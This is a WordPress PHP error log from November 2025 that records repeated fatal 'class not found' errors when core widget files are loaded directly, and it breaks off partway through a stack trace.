[10-Nov-2025 13:21:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[10-Nov-2025 17:26:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[10-Nov-2025 19:43:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[11-Nov-2025 06:18:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[11-Nov-2025 07:39:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[11-Nov-2025 11:54:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[11-Nov-2025 18:45:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[12-Nov-2025 10:59:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[12-Nov-2025 17:08:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[13-Nov-2025 00:56:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[13-Nov-2025 13:04:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[13-Nov-2025 13:16:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[14-Nov-2025 01:36:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[14-Nov-2025 01:54:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[14-Nov-2025 08:53:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[14-Nov-2025 21:29:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[15-Nov-2025 13:46:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[15-Nov-2025 13:51:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[16-Nov-2025 01:11:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[16-Nov-2025 02:06:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[16-Nov-2025 03:12:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[16-Nov-2025 03:23:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[16-Nov-2025 13:54:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[16-Nov-2025 14:46:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[16-Nov-2025 19:22:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[16-Nov-2025 21:49:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[16-Nov-2025 21:58:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[16-Nov-2025 22:29:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[17-Nov-2025 08:23:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[18-Nov-2025 10:02:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[18-Nov-2025 13:21:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[18-Nov-2025 18:32:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[19-Nov-2025 02:08:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[19-Nov-2025 03:32:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[19-Nov-2025 06:21:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[19-Nov-2025 09:24:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[19-Nov-2025 09:52:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[19-Nov-2025 13:23:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[19-Nov-2025 16:13:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[19-Nov-2025 21:40:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[20-Nov-2025 11:41:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[20-Nov-2025 13:42:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[20-Nov-2025 17:02:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[21-Nov-2025 01:18:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[21-Nov-2025 09:59:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[21-Nov-2025 12:26:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[21-Nov-2025 13:42:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[21-Nov-2025 18:14:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[22-Nov-2025 16:32:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[22-Nov-2025 17:34:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[22-Nov-2025 18:05:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[22-Nov-2025 18:13:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[22-Nov-2025 18:19:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[22-Nov-2025 19:45:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[23-Nov-2025 02:12:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[23-Nov-2025 08:42:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[23-Nov-2025 09:05:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[23-Nov-2025 13:27:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[24-Nov-2025 02:53:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[24-Nov-2025 08:40:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[24-Nov-2025 12:43:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[24-Nov-2025 17:00:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[25-Nov-2025 05:02:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[25-Nov-2025 08:45:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[25-Nov-2025 18:56:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[26-Nov-2025 00:23:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[26-Nov-2025 00:51:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[26-Nov-2025 00:58:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[26-Nov-2025 02:31:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[26-Nov-2025 13:59:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[26-Nov-2025 14:02:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[26-Nov-2025 14:57:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[26-Nov-2025 16:23:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[27-Nov-2025 16:50:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[28-Nov-2025 00:53:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[28-Nov-2025 01:00:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[28-Nov-2025 01:00:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[28-Nov-2025 01:00:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[28-Nov-2025 01:00:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[28-Nov-2025 01:00:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[28-Nov-2025 01:00:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[28-Nov-2025 01:00:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[28-Nov-2025 01:00:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[28-Nov-2025 01:00:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[28-Nov-2025 01:00:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[28-Nov-2025 01:00:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[28-Nov-2025 01:00:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[28-Nov-2025 01:00:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[28-Nov-2025 01:00:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[28-Nov-2025 01:00:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[28-Nov-2025 01:00:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[28-Nov-2025 01:00:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[28-Nov-2025 01:00:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[28-Nov-2025 01:00:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[28-Nov-2025 01:00:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[28-Nov-2025 03:26:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[28-Nov-2025 05:42:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[28-Nov-2025 06:11:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
